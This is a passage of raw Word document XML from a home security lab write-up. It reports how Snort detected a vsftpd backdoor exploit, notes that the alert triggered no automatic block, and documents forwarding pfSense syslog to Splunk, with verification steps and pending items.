        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Snort did not merely detect the exploit traffic — it specifically flagged the content of the attacker’s post-exploitation command output (an “id check returned root” response signature), demonstrating detection capability at the response/impact stage of the attack, not just at initial access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The alert was classified under “Potentially Bad Traffic” at priority 2, a lower severity than the SSH-scan signature seen in Scenario 01 (which triggered an automatic block). As a result, Block Offenders did not act on this alert, and the attacker’s session was not interrupted. This asymmetry — detection without automatic response — is a useful tuning note for future work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The vsftpd backdoor’s intermittent “cooldown” behavior on the first attempt is a property of the exploit itself, not a defense mechanism or a misconfiguration; recognizing this and retrying is the correct operator response, consistent with the detection-engineering principle established in Scenario 01 (distinguish real blockers from expected tool behavior before troubleshooting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-On Work: Forwarding pfSense/Snort Logs to Splunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At the time Scenario 02’s exploitation and native detection were completed, Snort alerts were visible only in pfSense’s own web UI; the lab’s Splunk instance (192.168.1.100) was only receiving forwarded Sysmon logs from the Windows host (192.168.2.101), per the architecture diagram. To close this gap, the following infrastructure work was carried out:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration completed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pfSense (Status → System Logs → Settings): enabled remote syslog forwarding to 192.168.1.100:514 (UDP), scoped to System Events and Firewall Events. Confirmed via Services → Snort → Snort Interfaces → Alert Settings that “Send Alerts to System Log” was already enabled (System Log Facility: LOG_AUTH, Priority: LOG_ALERT), so Snort alerts feed into the same system log stream being forwarded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk (Settings → Data Inputs → UDP): created a new UDP input on port 514, sourcetype pfsense, index default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verification performed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump on the Splunk host confirmed syslog packets arriving from pfSense (192.168.1.1) on port 514.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -lunp confirmed splunkd was actively bound to and listening on 0.0.0.0:514.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A Splunk search (index=* source="udp:514") returned 9 indexed events with host=192.168.1.1, sourcetype=pfsense, confirming the pipeline is functional end-to-end. The events observed so far are general System Events (DHCP client/lease messages); a dedicated Snort alert has not yet been generated and confirmed inside Splunk since the pipeline went live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Known limitations / pending items</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Data currently arrives as raw, unparsed syslog text rather than CIM-normalized fields. Installation of a dedicated Technology Add-on (TA-pfsense) was attempted but paused: the Splunk host (an Ubuntu VM with 3.3 GB RAM and no swap) hit an out-of-memory condition that killed splunkd during earlier testing. A 2 GB swap file was added as a mitigation (/swapfile, persisted via /etc/fstab), but installing and load-testing the TA is deferred until the VM’s RAM allocation can be increased.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Next verification step: trigger a fresh Snort alert (e.g. re-run an nmap scan or repeat the vsftpd exploit) and confirm the corresponding event appears in Splunk under sourcetype=pfsense, to close the loop between this scenario’s IDS detection and SIEM visibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots Referenced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshots/scenario02-vsftpd-service-restart.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshots/scenario02-exploitation-and-detection-combined.png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2026-07-15T07:34:40.571Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-15T07:34:40.589Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>